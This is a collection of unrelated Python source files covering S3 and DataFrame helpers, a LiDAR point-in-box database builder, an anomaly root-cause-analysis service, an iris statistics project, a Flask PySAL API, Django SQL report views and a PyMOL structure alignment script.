pass
return df
def list_s3_keys_in_bucket(s3client,
bucket,
prefix=''):
"""
Returns a list of the keys situated at the given prefix in the given bucket
:s3client: boto3.session.Session.client that represents a connection with s3
:bucket: string representing the s3 bucket's name
:prefix: string representing the base filepath to search at in the s3 bucket, default: ''
"""
keys = []
response = s3client.list_objects(Bucket=bucket, Prefix=prefix)['Contents']
for csv in response:
keys.append(csv['Key'])
return keys
def convert_df_to_s3_compressed_csv(df,
s3client,
bucket,
key,
sep=';',
compression='gzip'):
"""
Receives a dataframe and compress it into a csv
to the put it in the bucket at the key
:df: pandas.DataFrame to convert into a compressed csv
:s3client: boto3.session.Session.client that represents a connection with s3
:bucket: string representing the s3 bucket's name
:key: string representing the filepath in the s3 bucket
:sep: string representing the seperation in the compressed csv, default: ';'
:compression: string representing the type of compression on the file, default: 'gzip'
"""
tmp_file = './tmp_gzip_csv'
convert_df_to_csv(df, filepath=tmp_file, sep=sep, compression=compression)
s3client.upload_file(Filename=tmp_file,
Bucket=bucket,
Key=key)
os.remove('./tmp_gzip_csv')
def convert_df_to_csv(df, filepath, index_label='id', sep=',', encoding='utf-8', compression=None):
"""
Convert a given dataframe to a csv at the filepath using
the other arguments sa specifications
:df: pandas.Dataframe to convert
:filepath: string representing what path to save the csv to
:index_label: string representing the column label for the index column, default: 'id'
:sep: string representing the wanted seperation in the csv, default: ','
:encoding: string representing the encoding to use in the output file, default: 'utf-8'
"""
_create_filepath_if_nonexistent(filepath)
df.fillna(0.0, inplace=True)
df.index = np.arange(1, len(df)+1)
df.to_csv(filepath,
index_label=index_label,
sep=sep,
encoding=encoding,
compression=compression)
def convert_df_to_django_model(df,
model,
rewrite=False,
rows_at_a_time=250):
"""
Import a given dataframe to Django's ORM with a specified model
:df: pandas.Dataframe to convert
:model: django.db.models.Model's name. The ORM takes care of which table to put the data in
:rewrite: boolean representing wether to delete the old entries or not, default: False
:rows_at_a_time: int representing the amount of rows to import at the same time, default: 250
"""
if os.getenv('DJANGO_SETTINGS_MODULE'):
from import_export import resources
else:
raise Exception('This function can only be used in Django projects.')
if rewrite:
_clear_model_table(model)
try:
# Since Django's ORM uses incremental IDs by default
# we need to go and take the next 'available' one
# if the query returns none, then we start at 0
query = model.objects.values('id').order_by('-id').first()
last_id = query['id'] + 1 if query is not None else 0
dataset = _convert_df_to_dataset(df, last_id)
p_resource = resources.modelresource_factory(model=model)()
for i in range(0, len(dataset), rows_at_a_time):
data = tablib.Dataset(*dataset[i:i+rows_at_a_time],
headers=dataset.headers)
p_resource.import_data(data)
except Exception as err:
return print(err)
|
<gh_stars>1-10
import pickle
import itertools
import numpy as np
import os.path as osp
from tqdm import tqdm
from collections import defaultdict
from .kitti_utils import read_velo
def points_in_convex_polygon(points, polygon, ccw=True):
"""points (N, 2) | polygon (M, V, 2) | mask (N, M)"""
polygon_roll = np.roll(polygon, shift=1, axis=1)
polygon_side = (-1) ** ccw * (polygon - polygon_roll)[None]
vertex_to_point = polygon[None] - points[:, None, None]
mask = (np.cross(polygon_side, vertex_to_point) > 0).all(2)
return mask
def center_to_corner_box2d(boxes):
"""
:boxes np.ndarray shape (N, 7)
:corners np.ndarray shape (N, 4, 2) (counter-clockwise)
"""
xy, _, wl, _, yaw = np.split(boxes, [2, 3, 5, 6], 1)
c, s = np.cos(yaw), np.sin(yaw)
R = np.stack([c, -s, s, c], -1).reshape(-1, 2, 2)
corners = 0.5 * np.r_[-1, -1, +1, -1, +1, +1, -1, +1]
corners = (wl[:, None] * corners.reshape(4, 2))
corners = np.einsum('ijk,imk->imj', R, corners) + xy[:, None]
return corners
class PointsInCuboids:
"""Takes ~10ms for each scene."""
def __init__(self, points):
self.points = points
def _height_threshold(self, boxes):
"""Filter to z slice."""
z1 = self.points[:, None, 2]
z2, h = boxes[:, [2, 5]].T
mask = (z1 > z2 - h / 2) & (z1 < z2 + h / 2)
return mask
def _get_mask(self, boxes):
polygons = center_to_corner_box2d(boxes)
mask = self._height_threshold(boxes)
mask &= points_in_convex_polygon(
self.points[:, :2], polygons)
return mask
def __call__(self, boxes):
"""Return list of points in each box."""
mask = self._get_mask(boxes).T
points = list(map(self.points.__getitem__, mask))
return points
class PointsNotInRectangles(PointsInCuboids):
def _get_mask(self, boxes):
polygons = center_to_corner_box2d(boxes)
mask = points_in_convex_polygon(
self.points[:, :2], polygons)
return mask
def __call__(self, boxes):
"""Return array of points not in any box."""
mask = ~self._get_mask(boxes).any(1)
return self.points[mask]
class DatabaseBuilder:
def __init__(self, cfg, annotations):
self.cfg = cfg
self.fpath = osp.join(cfg.DATA.CACHEDIR, 'database.pkl')
if osp.isfile(self.fpath):
print(f'Found cached database: {self.fpath}')
return
self._build(annotations)
def _build(self, annotations):
database = defaultdict(list)
for item in tqdm(annotations.values(), desc='Building database'):
for key, val in zip(*self._process_item(item)):
database[key] += [val]
self._save_database(dict(database))
def _demean(self, points, boxes):
"""Subtract box center (birds eye view)."""
_points, _boxes = [], []
for points_i, box_i in zip(points, boxes):
center, zwlhr = np.split(box_i, [2])
xy, zi = np.split(points_i, [2], 1)
_points += [np.concatenate((xy - center, zi), 1)]
_boxes += [np.concatenate((0 * center, zwlhr))]
return _points, _boxes
def _process_item(self, item):
"""Retrieve points in each box in scene."""
points = read_velo(item['velo_path'])
class_idx, boxes = item['class_idx'], item['boxes']
points = PointsInCuboids(points)(boxes)
keep = [len(p) > self.cfg.AUG.MIN_NUM_SAMPLE_PTS for p in points]
class_idx, points, boxes = [
itertools.compress(t, keep) for t in (class_idx, points, boxes)]
points, boxes = self._demean(points, boxes)
samples = [dict(points=p, box=b) for (p, b) in zip(points, boxes)]
return class_idx, samples
def _save_database(self, database):
with open(self.fpath, 'wb') as f:
pickle.dump(database, f)
|
<reponame>LeiSoft/CueObserve<filename>api/anomaly/services/rootCauseAnalyses.py<gh_stars>100-1000
import json
import logging
import traceback
import datetime as dt
import dateutil.parser as dp
from utils.apiResponse import ApiResponse
from ops.tasks import rootCauseAnalysisJob
from app.celery import app
from anomaly.models import RootCauseAnalysis, RCAAnomaly, Anomaly
from anomaly.serializers import RootCauseAnalysisSerializer, RCAAnomalySerializer
from ops.tasks.detection.core.anomalyDetection import detect, dataFrameEmpty
logger = logging.getLogger(__name__)
class RootCauseAnalyses:
"""
Class to deal with functionalities associataed with RCA
"""
@staticmethod
def calculateRCA(anomalyId: int):
"""
Trigger job for RCA calculation
:param anomalyId: id of anomaly object needed to be analyzed
"""
res = ApiResponse("Error in triggering RCA calculation")
rootCauseAnalysis, _ = RootCauseAnalysis.objects.get_or_create(
anomaly_id=anomalyId
)
rootCauseAnalysis.status = RootCauseAnalysis.STATUS_RECEIVED
rootCauseAnalysis.save()
task = rootCauseAnalysisJob.delay(anomalyId)
rootCauseAnalysis = RootCauseAnalysis.objects.get(anomaly_id=anomalyId)
rootCauseAnalysis.taskIds = [*rootCauseAnalysis.taskIds, task.id]
rootCauseAnalysis.save()
res.update(True, "Successfully triggered RCA calculation")
return res
@staticmethod
def getRCA(anomalyId: int):
"""
Get data for RCA
:param anomalyId: id of anomaly object whose RCA to be fetched
"""
res = ApiResponse("Error in getting RCA")
anomaly = Anomaly.objects.get(id=anomalyId)
rcaAnomalies = RCAAnomaly.objects.filter(anomaly_id=anomalyId).order_by(
"-data__anomalyLatest__value"
)
rcaAnomaliesData = RCAAnomalySerializer(rcaAnomalies, many=True).data
data = {
"status": None,
"logs": None,
"startTimestamp": None,
"endTimestamp": None,
}
if hasattr(anomaly, "rootcauseanalysis"):
data = {
**data,
**RootCauseAnalysisSerializer(anomaly.rootcauseanalysis).data,
}
data = {
**data,
"granularity": anomaly.anomalyDefinition.dataset.granularity,
"measure": anomaly.anomalyDefinition.metric,
"dimension": anomaly.anomalyDefinition.dimension,
"dimensionValue": anomaly.dimensionVal,
"value": anomaly.data["anomalyLatest"]["value"],
"anomalyContribution": anomaly.data["contribution"],
"rcaAnomalies": rcaAnomaliesData,
"anomalyTime": anomaly.data["anomalyLatest"]["anomalyTimeISO"],
}
res.update(True, "Successfully retrieved RCA", data)
return res
@staticmethod
def abortRCA(anomalyId: int):
"""
Abort RCA
:param anomalyId: id of anomaly object whose RCA needs to be aborted
"""
res = ApiResponse("Error in aborting RCA")
try:
rootCauseAnalysis = RootCauseAnalysis.objects.get(anomaly_id=anomalyId)
app.control.revoke(rootCauseAnalysis.taskIds, terminate=True)
rootCauseAnalysis.status = RootCauseAnalysis.STATUS_ABORTED
rootCauseAnalysis.endTimestamp = dt.datetime.now()
rootCauseAnalysis.save()
res.update(True, "Successfully triggered RCA calculation")
except Exception as ex:
logger.error("Error in aborting RCA:%s", str(ex))
return res
@staticmethod
def createRCAAnomaly(
anomalyId: int, dimension: str, dimensionValue: str, contriPercent: float, df
):
"""
Create RCA Anomaly for given anomalyId, dimension, dimensionValue
:param anomalyId: id of anomaly object being analyzed
:param dimension: dimension for which anomaly is being analyzed
:param dimensionValue: dimension value for which anomaly is being analyzed
:param contriPercent: percent contribution of given dimension: dimensionValue is whole
:param df: data for anomaly detection
"""
anomaly = Anomaly.objects.get(id=anomalyId)
output = {"dimVal": dimensionValue, "success": True}
try:
if dataFrameEmpty(df):
return output
granularity = anomaly.anomalyDefinition.dataset.granularity
result = detect(
df, granularity, "Prophet", anomaly.anomalyDefinition, limit=6
)
del result["anomalyData"]["predicted"]
# removing anomalous point other than last one
anomalyTimeISO = anomaly.data["anomalyLatest"]["anomalyTimeISO"]
if (
not "anomalyLatest" in result
or not result["anomalyLatest"]
or result["anomalyLatest"]["anomalyTimeISO"] != anomalyTimeISO
):
return output
for row in result["anomalyData"]["actual"]:
if not (row["ds"] == anomalyTimeISO and row["anomaly"] == 15):
row["anomaly"] = 1
else:
row["anomaly"] = 6
# removing prediction band
result["anomalyData"]["band"] = result["anomalyData"]["band"][:-15]
result["contribution"] = contriPercent
result["anomalyLatest"]["contribution"] = contriPercent
rcaAnomaly, _ = RCAAnomaly.objects.get_or_create(
anomaly_id=anomalyId, dimension=dimension, dimensionValue=dimensionValue
)
rcaAnomaly.data = result
rcaAnomaly.save()
output["rcaAnomalyId"] = rcaAnomaly.id
except Exception as ex:
output["error"] = json.dumps(
{"message": str(ex), "stackTrace": traceback.format_exc()}
)
output["success"] = False
return output
|
# <NAME> - 22 March 2018
# Student ID: G00364778
# GMIT 52167 Final Project
"""
The purpose of this python code is to perform three major functions on the iris dataset
* Read is the csv data from a text file and return it in a format for further processing
* Run some basic statistical calculations on the dataset
* Graph the results for graphical comparison
The raw iris dataset consists of the following
1. sepal length in cm
2. sepal width in cm
3. petal length in cm
4. petal width in cm
5. class:
- Iris Setosa
- Iris Versicolour
- Iris Virginica
The csv read returns this sampe: # 6.7,3.0,5.2,2.3,Iris-virginica
"""
import numpy as np
from matplotlib import pyplot as pl
import csv
# from sklearn.preprocessing import normalize as norm # not used, but kept for reference
import os
from scipy import stats
setnames=['sepl','sepw','petl','petw']
setlabels=['Sepal Length','Sepal Width','Petal Length','Petal Width']
species=['Setosa','Versicolour','Virginica']
statlabels=['nobs', 'min', 'max', 'mean', 'var', 'skew', 'kurt']
def read_csv_datafile(datafile=r'data\iris.data'):
"""
Read the csv data file passed in to the fucntion, parse the data values from the file,
create a numpy array of floats and transpose them to a format useable in further statistical
processing and graphing in array format.
return value - numpy array of 4 x 50 floatingpoint values
"""
with open(datafile) as file:
line=csv.reader(file)
data=list(line)
data.pop() # pop the empty line from the csv file read
data=np.asarray(data) #c reate a numpy array to work with
data=data[0::,0:4].astype(float).transpose() # convert all numbers to floats and transpose the data
return data
def creat_xy_plots(dataset, species_in_set=3):
"""
Create a plot from the dataset passed in.
Imputs: dataset - the numpy array with sampe data retrieved in 'read_csv_datafile'
specied in set - default of 3 onless specified
Outputs: generating plot images in the 'plots' subfolder
"""
cols,samples=np.shape(dataset) # retrieve the columns and samples from the set passed in
b=[i for i in range(0,(samples+(samples//species_in_set)),(samples//species_in_set))] # calculate boundaries
#print(b) # [0, 50, 100, 150] # test the calculations
for x in range(cols): # loop through the four datasets
for y in range(x,cols):
if x!=y:
#print(x,y)
Set,Ver,Vir=pl.plot(dataset[x,b[0]:b[1]],dataset[y,b[0]:b[1]],'ro',dataset[x,b[1]:b[2]],dataset[y,b[1]:b[2]],'go',dataset[x,b[2]:b[3]],dataset[y,b[2]:b[3]],'bo')
pl.title('Iris plot by species - {} x {}'.format(setlabels[x],setlabels[y]))
pl.legend((Set,Ver,Vir),species)
pl.xlabel('{}(cm)'.format(setlabels[x]))
pl.ylabel('{}(cm)'.format(setlabels[y]))
filename='plots\\iris_plt_{}_{}.png'.format(setnames[x],setnames[y])
os.makedirs(os.path.dirname(filename),mode=0o777,exist_ok=True)
pl.savefig(filename)
pl.close()
def calc_stats (data, screenprint=False):
"""
Create a list of statistcis and create an array with the results sorted by return types
with the option to print them out in a table.
Imputs: data - the set returned by read_csv_datafile
Outputs:
nobs - number of objects in set
min - the minimum values in the set
max - the maximum values in the set
mean - the mean(average) of the set
var - the variance or standard deviation in the set
skew - the skewness indicating the lack of symmetry, symmetric if it looks the same to the left and right of the center point
kurt - the kurtosis, heavy-tailed or light-tailed
"""
cols,samples=np.shape(data) # retrieve the columns and samples from the set passed in
stat=[]
vals=[]
for i in range(cols):
stat.append(stats.describe(data[i])) # collect the stats
#myarr=np.asarray(stat)
statArr=[]
for i in range(cols):
#print
nobsv, minmaxv, meanv, variancev, skewv, kurtosisv = stat[i]
minv,maxv=minmaxv
vals=nobsv, minv, maxv, meanv, variancev, skewv, kurtosisv
statArr.append(vals)
#print('{}\n{}\n{}\n{}\n{}\n{}\n{}\n'.format(nobsv, minv, maxv, meanv, variancev, skewv, kurtosisv),sep='',end='')
st=np.asarray(statArr).transpose()
if screenprint==True:
#print the headings
print('\n+-------+---------------+---------------+---------------+---------------+')
print('|Stat',end='')
for i in range (len(setlabels)):
print('\t|{}'.format(setlabels[i]),sep='', end='')
print('\t|\n',end='')
print('+-------+---------------+---------------+---------------+---------------+')
row,col=np.shape(st)
# print the data
for i in range(row):
print('|{}\t'.format(statlabels[i]),sep='',end='')
for j in range(col):
print('|{:7.3f}\t'.format(st[i][j]),sep='',end='')
print('|\n',end='')
print('+-------+---------------+---------------+---------------+---------------+')
return st
def plot_hist(data,action='view'): # pass view of save for actions
for i in range(len(data)):
pl.hist(data[i])
pl.ylabel(setlabels[i])
if action == 'view':
pl.show()
elif action == 'save':
filename='plots\\iris_hist_{}.png'.format(setnames[i])
os.makedirs(os.path.dirname(filename),mode=0o777,exist_ok=True)
pl.savefig(filename)
pl.close()
#data=read_csv_datafile()
#creat_xy_plots(data)
#stat=calc_stats(data, screenprint=True)
#plot_hist(data,action='save')
|
from collections import Mapping
import copy
import os
import flask
from flask import Flask, jsonify, request, g, render_template, session,\
redirect, url_for, escape, current_app
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
#from flask.ext.cors import CORS
import krispy
print dir(krispy)
from krispy.mod_api.extractapi import recursive_extract, recursive_documentation
import mod_api.aggregate as agg
import config
from decorators import crossdomain
#Custom
import w_from_geojson
#TODO: Library name from config
library = __import__(config.library)
#Create the app
app = Flask(__name__)
app.debug = config.DEBUG
#Create the login manager
app.config['LOGIN_DISABLED'] = config.LOGIN_DISABLED
lm = LoginManager(app)
lm.login_view = "user.login"
#Add a class_references attribute to the application
with app.app_context():
if getattr(current_app, 'class_references',None) is None:
current_app.class_references = {}
seen_classes = set() # Geom tables already mapped
#Configure the application from config.py
app.config.from_object('config')
#Define the database to be used by
db = SQLAlchemy(app)
#Setup a fixed length dict to store cached objs
#TODO: Write a fixed length dict. by subclassing OrderedDict
cachedobjs = {}
#Initialize a listing of the library functionality
"""
The idea here is that pysalfunctions could be swapped
to be a JSON file or the underlying logic can change.
The only requirement is that this is a dictionary with
a most nested level of 'function_name':func_object pairs.
"""
def treeZip(t1,t2, path=[]):
"""
Compare two dictionaries, updating t2 with key missing from
t1.
"""
if isinstance(t1, dict) and isinstance(t2, dict):
try:
assert(t1.keys() == t2.keys())
except AssertionError:
current_keys = set(t1.keys())
mapped_keys = set(t2.keys())
for k in current_keys.difference(mapped_keys):
t2[k] = 'True'
if isinstance(t1,Mapping) and isinstance(t2,Mapping):
#assert set(t1)==set(t2)
for k,v1 in t1.items():
v2 = t2[k]
for tuple in treeZip(v1,v2, path=path+[k]):
yield tuple
else:
yield (path, (t1,t2))
def setInDict(dataDict, mapList, value):
getFromDict(dataDict, mapList[:-1]).pop(value, None)
def getFromDict(dataDict, mapList):
return reduce(lambda d, k: d[k], mapList, dataDict)
def clean_empty(d):
for k, v in d.items():
if isinstance(v,dict):
if not v:
d.pop(k, None)
else:
clean_empty(v)
visited = set([])
libraryfunctions = {}
recursive_extract(library, libraryfunctions, library.__name__, visited)
libraryfunctions['weights']['user']['queen_from_geojson'] = w_from_geojson.queen_geojson
#Recursive function extraction
librarydocs = copy.deepcopy(libraryfunctions)
recursive_documentation(librarydocs)
print librarydocs['weights']['user']['queen_from_geojson']
if config.loadmap:
import json
with open(config.loadmap, 'r') as configin:
mapping = json.load(configin)
livekeys = list(treeZip(libraryfunctions, mapping))
#livekeys is updated with potential new entries and rewritten, keeping existing settings
with open('librarymap.json', 'w') as mapfile:
mapfile.write(json.dumps(mapping, indent=2))
for k, v in livekeys:
if v[1] == False:
dataDict = setInDict(libraryfunctions, k, k[-1])
dataDict = setInDict(librarydocs, k, k[-1])
#How can I better recursively clean?
for x in range(4):
clean_empty(libraryfunctions)
clean_empty(librarydocs)
#Add in the custom aggregator
libraryfunctions['custom'] = {}
libraryfunctions['custom']['aggregator'] = agg.aggregator
librarydocs['custom'] = {}
librarydocs['custom']['aggregator'] = agg.aggregator_docs
print libraryfunctions.keys()
@lm.user_loader
def load_user(id):
#Lazy load to avoid cylical imports
from app.mod_user.models import User
return User.query.get(int(id))
#Error handling routed
@app.errorhandler(404)
def not_found(error):
return "Error 404: Unable to find endpoint."
#Home
@app.route('/', methods=['GET'])
def api_root():
response = {'status':'success'}
response['links'] = [{'name':'api', 'href': config.baseurl + '/api/', 'description':'Access to the PySAL API'},
{'name':'user', 'href': config.baseurl + '/user/', 'description':'Login, Registration, and User management'},
{'name':'data', 'href':config.baseurl + '/data/', 'description':'User data and upload functionality'}]
return jsonify(response)
###Import components use a blue_print handler###
#API
from app.mod_api.controllers import mod_api as api_module
app.register_blueprint(api_module, url_prefix='/api')
#User Management
from app.mod_user.controllers import mod_user as user_module
users = app.register_blueprint(user_module, url_prefix='/user')
#Data
from app.mod_data.controllers import mod_data as data_module
data = app.register_blueprint(data_module, url_prefix='/data')
#CORS(data) #Allow CORS calls to the data blueprint
#Uploads
#from app.mod_upload.controllers import mod_upload as upload_module
#app.register_blueprint(upload_module, url_prefix='/upload')
#Create the tables if this is a new deployment
db.create_all()
|
<filename>django_harmonization/ui/report_views.py<gh_stars>0
#!/usr/bin/env python3
'''
Copyright 2017 The Regents of the University of Colorado
Licensed under the Apache License, Version 2.0 (the "License")
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
report_views.py <db> <user>
Python Version: 3.6.3
croeder 3/2018 <EMAIL>
cribbed from report.py
'''
import psycopg2
from psycopg2.extras import RealDictCursor
from HeartData.study import get_study_details
class StudyValueSerializer(serializers.Serializer):
id = serializers.CharField(max_length=100);
value = serializers.CharField(max_length=100);
from_table = serializers.CharField(max_length=100);
from_column = serializers.CharField(max_length=100);
def get_concept_id_and_name(con, vocabulary, concept_code):
''' given a vocabulary name and concept code, return the concept_id within OHDSI CDM'''
cur = con.cursor(cursor_factory=RealDictCursor)
stmt = ("SELECT concept_id, concept_name "
"FROM concept "
"WHERE concept_code = %s and vocabulary_id = %s")
cur.execute(stmt, (concept_code, vocabulary))
rows = cur.fetchall()
cur.close()
if rows:
return (rows[0]['concept_id'], rows[0]['concept_name'])
# else:
return (None, None)
# SERIALIZE
json_list=list()
for row in rows:
print("DEBUG: get_study_values() ROW", row)
serializer = StudyValueSerializer(row)
serialized = serializer.data
print("DEBUG: get_study_values() SER", serialized)
json_list.append(serialized)
return(JsonResponse(json_list, safe=False, status=200)) # JsonResponse application/json
def extract_calculation_arguments(con, study_id, to_vocabulary, to_concept_code, function_name):
''' fetch arguments to go with a calculation rule'''
log = sys.stdout.write
stmt = ("SELECT argument_name, value_field, vocabulary_id, concept_code, from_table "
"FROM ohdsi_calculation_argument "
"WHERE study_id = %s and to_concept_code = %s "
"AND to_vocabulary_id = %s and function_name = %s")
#print stmt, (study_id, to_vocabulary, to_concept_code, function_name)
cur = con.cursor(cursor_factory=RealDictCursor)
cur.execute(stmt, (study_id, to_concept_code, to_vocabulary, function_name))
rows = cur.fetchall()
for row in rows:
log(" {}:{}, {}:{} \"{}\"\n".format(row['vocabulary_id'],
row['concept_code'],
row['from_table'],
row['value_field'],
row['argument_name']))
cur.close()
## TODO ohdsi_calculated_table
def report_calculated_concepts(con, study_id):
''' join the configuration of mapping together and produce/print a report '''
stmt = ("SELECT ocf.function_name as fn, "
"ocf.to_vocabulary_id as vocab, "
"ocf.to_concept_code as concept, "
"ocf.function_order as f_order "
"FROM ohdsi_calculation_function ocf "
"WHERE ocf.study_id = %s "
"ORDER BY ocf.to_concept_code, ocf.function_order ")
cur = con.cursor(cursor_factory=RealDictCursor)
cur.execute(stmt, (study_id,))
rows = cur.fetchall()
return(rows)
def extract_function_parameters(con, function_name, long_name, rule_id):
''' fetch the parameters to go with an extraction function '''
stmt = ("SELECT value_limit, from_string, from_concept_id, rank "
"FROM categorization_function_parameters "
"WHERE function_name = %s "
"AND long_name = %s "
"AND rule_id = %s "
"ORDER BY rank")
cur = con.cursor(cursor_factory=RealDictCursor)
cur.execute(stmt, (function_name, long_name, rule_id))
rows = cur.fetchall()
cur.close()
return(rows)
#class MappedConceptsSerializer(serializers.Serializer):
# study_id
# from_table as m_from_table
#= serializers.CharField(max_length=100);
# from_column as m_from_column
#= serializers.CharField(max_length=100);
# function_name as m_function_name
#= serializers.CharField(max_length=100);
# vocabulary_id as vocab
#= serializers.CharField(max_length=100);
# concept_code as concept
#= serializers.CharField(max_length=100);
# to_table as m_to_table
#= serializers.CharField(max_length=100);
# to_column as m_to_column
#= serializers.CharField(max_length=100);
# from_table as c_from_table
#= serializers.CharField(max_length=100);
# function_name as c_function_name
#= serializers.CharField(max_length=100);
# long_name as c_long_name
#= serializers.CharField(max_length=100);
# rule_id
# id
#= serializers.CharField(max_length=100);
# value = serializers.CharField(max_length=100);
# from_table = serializers.CharField(max_length=100);
# from_column = serializers.CharField(max_length=100);
def report_mapped_concepts(con, study_id):
''' report and print the configuration
joins on categorization_function_metadata so it only shows
concepts used by direct extraction/categorization
'''
cur = con.cursor(cursor_factory=RealDictCursor)
stmt = ("SELECT "
"m.study_id, "
"m.from_table as m_from_table, "
"m.from_column as m_from_column, "
"m.function_name as m_function_name, "
"m.vocabulary_id as vocab, "
"m.concept_code as concept, "
"m.to_table as m_to_table, "
"m.to_column as m_to_column, "
"c.from_table as c_from_table, "
"c.function_name as c_function_name, "
"c.long_name as c_long_name,"
"c.rule_id "
"FROM study_to_ohdsi_mapping m, categorization_function_metadata c "
"WHERE m.study_id = %s "
"AND m.function_name is not null "
"AND m.vocabulary_id = c.from_vocabulary_id "
"AND m.concept_code = c.from_concept_code "
"ORDER BY m.study_id, c.long_name;")
cur.execute(stmt, (study_id,))
rows = cur.fetchall()
# SERIALIZE
json_list=list()
for row in rows:
print("DEBUG: get_study_values() ROW", row)
serializer = StudyValueSerializer(row)
serialized = serializer.data
print("DEBUG: get_study_values() SER", serialized)
json_list.append(serialized)
return(JsonResponse(json_list, safe=False, status=200)) # JsonResponse application/json
def report_unmapped_concepts(con, study_id):
''' report and print the configuration
doesn't have the jion as above, lists concepts that might be used
as input to further calculation
'''
cur = con.cursor(cursor_factory=RealDictCursor)
stmt = ("SELECT m.study_id, m.from_table as m_from_table, "
"m.from_column as m_from_column, "
"m.function_name as m_function_name, "
"m.vocabulary_id as vocab, "
"m.concept_code as concept, "
"m.to_table as m_to_table, "
"m.to_column as m_to_column, "
"o.function_name as function_name "
"FROM study_to_ohdsi_mapping m "
" JOIN ohdsi_calculation_argument o "
" ON m.vocabulary_id = o.vocabulary_id "
" AND o.concept_code = m.concept_code "
" AND o.study_id = m.study_id "
"WHERE m.study_id = %s "
" AND m.function_name is not null "
"ORDER BY m.study_id;")
cur.execute(stmt, (study_id,))
rows = cur.fetchall()
return(rows)
def report_calculated_extraction(con, study_id, extract_study_id):
''' Shows categorization for results of calculations.
This is for concepts that don't come directly from input tables, rather
ones that are calculated.
'''
cur = con.cursor(cursor_factory=RealDictCursor)
stmt = ("SELECT "
"c.from_vocabulary_id, "
"c.from_concept_code, "
"c.from_table, "
"c.function_name, "
"c.long_name, "
"c.rule_id "
"FROM categorization_function_metadata c "
" LEFT JOIN study_to_ohdsi_mapping m "
" ON m.vocabulary_id = c.from_vocabulary_id "
" AND m.concept_code = c.from_concept_code "
"WHERE m.study_id = %s "
" AND c.extract_study_id = %s "
"AND m.function_name is null "
"ORDER BY m.study_id, c.long_name;")
cur.execute(stmt, (extract_study_id, study_id,))
rows = cur.fetchall()
return(rows)
def report_events_mapping(con, study_id):
cur = con.cursor(cursor_factory=RealDictCursor)
stmt = ("SELECT from_table, from_column, value_vocabulary_id, value_concept_code, to_table, to_column, from_date_column, where_clause, comment "
" FROM events_mapping "
" WHERE study_id = %s")
cur.execute(stmt, (study_id,))
rows = cur.fetchall()
return(rows)
def report_wide_extraction(con, extract_study_id):
cur = con.cursor(cursor_factory=RealDictCursor)
stmt = ("SELECT from_table, from_column, from_vocabulary_id, from_concept_code, function_name, long_name "
" FROM categorization_function_table "
" WHERE extract_study_id = %s")
cur.execute(stmt, (extract_study_id,))
rows = cur.fetchall()
return(rows)
def get_study_name(con, study_id) :
cur = con.cursor()
stmt = "SELECT study_name FROM study WHERE study_id = %s"
print(type(study_id))
print(study_id)
cur.execute(stmt, (study_id, ))
rows = cur.fetchall()
def get_study_details(con, name) :
''' returns (study_id, observation_range_start, observation_range_end, person_id_range_start, person_id_range_end ) given a study name
raises if it can't find the study name
'''
cur = con.cursor()
stmt = "SELECT study_id, observation_range_start, observation_range_end, person_id_range_start, person_id_range_end FROM study WHERE study_name = %s"
cur.execute(stmt, (name,))
rows = cur.fetchall()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
''' Align a list of molecules using `super` command in PyMol. The first item
in the list is considered as the reference.
'''
import pymolPy3
import pyrotein as pr
import os
from loaddata import load_gpcrdb_xlsx
## from pmview import view_dict
job_name = "xfam"
# [[[ OBTAIN THE CONSENSUS SEQUENCE ]]]
# Read the sequence alignment result...
fl_aln = f"{job_name}.step4.psa.fil.fasta"
seq_dict = pr.fasta.read(fl_aln)
# The default ones are not good enough
nseqi = 616
cseqi = 1248
# Define atoms used for distance matrix analysis...
backbone = ["N", "CA", "C", "O"]
len_res = len(backbone)
len_seq = (cseqi - nseqi + 1) * len_res
# [[[ LOAD DATABASE ]]]
# Specify chains to process...
fl_chain = "gpcrdb.all.xlsx"
sheet = f"{job_name}"
lines = load_gpcrdb_xlsx(fl_chain, sheet = sheet, splitchain = True)
drc = "pdb"
# Define atoms used for structural alignment...
backbone = ["N", "CA", "C", "O"]
# Specify the backbone atoms to select...
backbone_select = "name " + "+".join( backbone )
# Specify the rigid framework...
fl_fwk = 'fwk.dat'
fwk = pr.utils.read_file(fl_fwk)
fwk = [ [int(i) // 4, int(j) // 4] for i, j in fwk ]
# Pick a PDB...
pdb, chain = "6PS6", "A"
fl_pdb = f"{pdb}.pdb"
pdb_path = os.path.join(drc, fl_pdb)
atoms_pdb = pr.atom.read(pdb_path)
atom_dict = pr.atom.create_lookup_table(atoms_pdb)
chain_dict = atom_dict[chain]
# Obtain seq string for the current chain...
tar_seq = seq_dict[f"{pdb.lower()}_{chain}"]
# Obtain the mapping from seqi to resi...
seqi_to_resi_dict = pr.atom.seqi_to_resi(chain_dict, tar_seq, nseqi, cseqi)
tar_seq_fil = tar_seq[ nseqi : cseqi + 1 ]
resi_min = seqi_to_resi_dict[nseqi + pr.fasta.get_lseqi(tar_seq_fil)]
resi_max = seqi_to_resi_dict[nseqi + pr.fasta.get_rseqi(tar_seq_fil)]
# Find all resi required for alignment...
fwk_resi = []
for b, e in fwk:
for i in range(b, e + 1):
seqi = nseqi + i
resi = seqi_to_resi_dict[seqi]
if resi is None: continue
fwk_resi.append(resi)
fwk_select = {}
fwk_select[f"{pdb}_{chain}"] = '+'.join( [ str(i) for i in fwk_resi ] )
# Customize cartoon representation...
color = { "rigid" : "0xc1ffc1",
"mobile" : "0xb8b8ff", }
# Start pymol
pm = pymolPy3.pymolPy3()
pm("window size, 1500, 1500")
pm("bg white")
pm("set cartoon_fancy_helices, 1")
pm("set cartoon_highlight_color, grey90")
pm("set cartoon_dumbbell_length, 1")
pm("set cartoon_dumbbell_width, 0.3")
pm("set cartoon_dumbbell_radius, 0.2")
pm("set sphere_scale, 0.3")
# Load the first structure (target)...
entry = f"{pdb}"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
pm(f"remove {entry} and not chain {chain}")
pm(f"remove {entry} and not polymer.protein")
pm(f"hide cartoon, chain {chain}")
pm(f"show cartoon, chain {chain} and resi {resi_min}-{resi_max}")
# Select the rigid framework from the target...
target = f"{entry}_fwk"
pm(f"select {target}, (%{entry} and {backbone_select}) and (resi {fwk_select[f'{pdb}_{chain}']})")
